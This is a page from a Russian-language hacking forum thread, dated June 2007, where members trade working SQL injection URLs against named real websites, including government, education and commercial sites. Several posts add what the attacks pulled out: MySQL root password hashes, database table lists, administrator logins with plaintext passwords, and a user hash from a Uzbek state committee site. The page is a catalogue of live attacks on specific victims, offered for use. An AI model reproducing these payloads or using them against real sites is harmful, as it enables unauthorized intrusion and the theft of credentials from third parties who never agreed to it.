ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2531  
Старый 17.06.2007, 17:06
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

Код:
http://photoshopia.ru/forum/arcade.php?gsearch='+union+select+1,2,3,4,concat(user(),char(58),password,char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+users/*
вывод внизу.
 
Ответить с цитированием

  #2532  
Старый 18.06.2007, 06:50
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.slavrealt.ru/geografia.php?object=9+union+select+1,2,3,4,5,6/*
 
Ответить с цитированием

  #2533  
Старый 18.06.2007, 09:15
Аватар для Kryonn
Kryonn
Новичок
Регистрация: 21.01.2007
Сообщений: 3
Провел на форуме:
19270

Репутация: 7
Отправить сообщение для Kryonn с помощью ICQ
По умолчанию

http://www.algoritmia.net/articles.php?id=-31+union+select+1,concat(password,CHAR(32,62,62,32 ),email),3,4,5,6+from+users+limit+0,5000/*
 
Ответить с цитированием

  #2534  
Старый 18.06.2007, 18:31
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

.gov
Код:
http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,version(),database(),user(),6,7,8,9,10,11,12/*
.edu
Код:
http://www.wishard.edu/news/release.php?id=-38+union+select+1,version(),database(),4,user(),6/*
.org
Код:
http://www.camdenme.org/news/release.php?ID=-63+union+select+1,2,3,4,user(),database(),7,8,9,10,11,12,13,14,version()/*
http://www.meprcouncil.org/news/release.php?ID=-66+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
.com
Код:
http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version(),database())/*
http://www.mainelobsterfestival.com/release.php?ID=-13+union+select+1,2,3,version(),user(),6,database(),8,9,10,11,12/*
http://www.peyron.com/release.php?id=-26+union+select+1,2,3,concat(version(),user()),database(),6,7,8/*
.net
Код:
http://www.integralwireless.net/news_media/release.php?id=-13+union+select+1,version(),database(),4,5,user(),7,8,9/*
Вкусненькое:

http://www.daltonagency.com/

Код:
http://www.daltonagency.com/release.php?id=-51+union+select+1,user,password,4,5,6,7+from+mysql.user/*
User: root
Password:51f2005954eb9d3e



http://www.playavista.com/
Код:
http://www.playavista.com/about/news/release.php?id=-18+union+select+1,2,3,4,5,6,convert(concat_ws(0x3b,password,user,database())using%20latin1),8+from+mysql.user/*
User: root
Password:*ECA88AB9EB85925FD22E637244E4E57A7C906C0A
 
Ответить с цитированием

  #2535  
Старый 18.06.2007, 21:46
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

4й мускул, таблицы подобрать не смог

_http://www.uprava.org/section.php?id=-19+union+select+1,2,3,4,5,6,7/*&sub_id=126
_http://www.trimm.ru/php/content.php?group=2&id=-3869+union+select+1,concat(user(),0x3a,version(),0 x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35/*

зы антибоян Константина не пашет, так что за повторы не ручаюсь.

Последний раз редактировалось geezer.code; 18.06.2007 в 22:05..
 
Ответить с цитированием

  #2536  
Старый 18.06.2007, 23:11
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.tehv.at/page/check.php?id=-62+union+select+1,2,password,4,5+from+user/*
Код:
http://www.accilifeskills.com/life-skills-curriculum/bad-check.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12/*
несколько минут в гугле =\
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2537  
Старый 18.06.2007, 23:32
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

во ищо одна
Код:
http://www.tppmo.ru/index.php?id=2&page=-3099+union+select+1,2,3,4,5,6/*
 
Ответить с цитированием

  #2538  
Старый 19.06.2007, 01:23
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

http://www.inforos.ru

------------------------------------------------------

SQL инъекция:

Код:
http://www.inforos.ru/?id=111111111111+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10/*
Код:
http://www.inforos.ru/?idraz=111111111+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7/*
Код:
http://www.inforos.ru/?idt=1111111111+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7/*
Код:
http://www.inforos.ru/firm/?parent=111111111+union+select+1,2,concat(database(),char(58),user(),char(58),version())/*
Код:
http://www.inforos.ru/?idp=1111111+union+select+concat(database(),char(58),user(),char(58),version())/*
inforosnet:inforosnet@localhost:5.0.41-log

------------------------------------------------------

Таблицы:

Код:
http://www.inforos.ru/?id=111111111111+union+select+table_name,2,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+26,1/*
Код:
conf_table_2005
inforos_about
inforos_about_photo
inforos_about_price
inforos_contact_person
inforos_document
inforos_enfirm
inforos_ensalebanner
inforos_firm
inforos_firm_to_rubrika
inforos_main
inforos_main_old
inforos_manager
inforos_myfirm
inforos_personali
inforos_region
inforos_region_firm
inforos_region_firm_old
inforos_reklama
inforos_reklama_t
inforos_rublika
inforos_rubrik_firm
inforos_rubrik_firm_t
inforos_salebanner
inforos_salebannertype
inforos_schet
inforos_search_fon
inforos_shablon
inforos_subscribe
inforos_subscribe_
inforos_themas
inforos_tmain
inforos_top_banner
inforos_translate
inforos_type
inforos_type_firm
inforos_user_reklama
inforos_user_reklama_t
otvet_admin_2005
------------------------------------------------------

inforos_manager:


Код:
http://www.inforos.ru/?id=111111111111+union+select+concat(id_manager,char(58),fio_manager,char(58),phones_manager,char(58),files_manager,char(58),firms_manager,char(58),login,char(58),pass,char(58),trec),2,3,4,5,6,7,8,9,10+from+inforos_manager+limit+0,1/*
Код:
http://www.inforos.ru/?id=111111111111+union+select+concat(login,char(58),pass),2,3,4,5,6,7,8,9,10+from+inforos_manager+limit+0,1/*
shurik:shurik
wer:wer
 
Ответить с цитированием

  #2539  
Старый 19.06.2007, 02:00
Аватар для ENFIX
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

Код:
http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SELECT+null,concat(user(),0x3a,version())/*
нашел только таблицу admin, да и то, поля не мог найти
 
Ответить с цитированием

  #2540  
Старый 19.06.2007, 06:09
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.uzgeolcom.uz/structure.php?lng=rus&id=-8+union+select+1,2,3,concat(login,0x3a,passw),5+from+users/*&oper=lst
Larisa:f5adec1d9b21223c5c0ca9ca49414d56
Государственный Комитет по Геологии и Минеральным Ресурсам Р Уз
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ